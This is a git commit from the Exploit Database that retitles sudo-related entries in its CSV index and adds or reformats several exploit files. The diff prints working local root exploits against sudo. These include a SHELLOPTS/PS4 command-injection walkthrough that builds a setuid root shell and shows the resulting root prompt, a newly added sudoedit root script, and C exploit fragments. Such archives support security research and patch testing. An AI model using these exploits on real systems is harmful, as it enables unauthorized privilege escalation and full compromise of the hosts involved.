DB: 2016-03-13

1 new exploits
This commit is contained in:
Offensive Security 2016-03-13 05:03:14 +00:00
parent fe74e95fff
commit fe689417a1
5 changed files with 95 additions and 70 deletions

View file

@ -298,7 +298,7 @@ id,file,description,date,author,platform,type,port
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
319,platforms/linux/local/319.c,"sudo.bin NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0
321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0
322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0
@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port
1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0
1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0
1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)",2005-07-04,RusH,bsd,local,0
1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0
1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0
1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0
@ -1089,7 +1089,7 @@ id,file,description,date,author,platform,type,port
1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0
1299,platforms/linux/local/1299.sh,"SuSE Linux <= 9.3 / 10 - (chfn) Local Root Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0
1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0
1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0
1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
@ -10658,7 +10658,7 @@ id,file,description,date,author,platform,type,port
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
@ -13633,7 +13633,7 @@ id,file,description,date,author,platform,type,port
15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson)",2010-12-07,"Dan Rosenberg",linux,local,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@ -18203,7 +18203,7 @@ id,file,description,date,author,platform,type,port
20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0
20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0
20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0
20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0
20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0
20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port
21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0
21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0
21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0
21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0
21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0
@ -18698,7 +18698,7 @@ id,file,description,date,author,platform,type,port
21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0
21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0
21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0
21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0
21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0
21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0
@ -21770,7 +21770,7 @@ id,file,description,date,author,platform,type,port
24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0
24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0
24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0
24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
@ -23630,7 +23630,7 @@ id,file,description,date,author,platform,type,port
26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow Exploit",2013-06-30,Chako,windows,remote,0
26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080
26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0
26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0
26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0
@ -24187,7 +24187,7 @@ id,file,description,date,author,platform,type,port
27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27057,platforms/linux/local/27057.py,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
27058,platforms/php/webapps/27058.txt,"PHPNuke 7.7 EV Search Module SQL Injection Vulnerability",2006-01-09,Lostmon,php,webapps,0
27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection Vulnerability",2006-01-09,night_warrior771,php,webapps,0
@ -25051,7 +25051,7 @@ id,file,description,date,author,platform,type,port
27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0
27944,platforms/osx/local/27944.rb,"Mac OS X Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0
27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0

Can't render this file because it is too large.

View file

@ -67,6 +67,6 @@ snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
system((char *)path);
}
}
}
// milw0rm.com [2005-07-04]
}
// milw0rm.com [2005-07-04]

View file

@ -1,52 +1,52 @@
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## by breno
## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##
ie:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
# milw0rm.com [2005-11-09]
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## by breno
## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##
ie:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
# milw0rm.com [2005-11-09]

View file

@ -57,6 +57,6 @@ main(int argc, char **argv)
execl(PATH_SUDO, "sudo.bin","bash", NULL);
}
// milw0rm.com [1996-02-13]
// milw0rm.com [1996-02-13]

View file

@ -0,0 +1,25 @@
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1